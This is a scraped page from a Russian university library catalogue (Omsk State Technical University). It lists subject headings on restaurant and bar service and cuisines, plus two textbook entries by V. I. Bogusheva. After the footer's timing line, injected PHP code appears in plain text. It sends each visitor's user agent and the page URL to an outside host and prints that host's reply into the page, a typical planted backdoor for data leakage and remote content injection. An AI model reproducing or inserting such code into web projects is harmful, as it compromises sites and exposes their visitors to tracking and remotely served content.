ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
20. 
Богушева В.И. Организация обслуживания посетителей ресторанов и баров [Текст] : Уч.пособие гриф-МО / В. И. Богушева, 2002. - 410 с.
Держатели документа (Информация об экземплярах) 
21. 
Богушева В. И. Бары и рестораны. Искусство обслуживания [Текст] : Искусство обслуживания / В. И. Богушева, 1999. - 351 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3217 - 31.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.33 с.14 запросов, 0.76c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;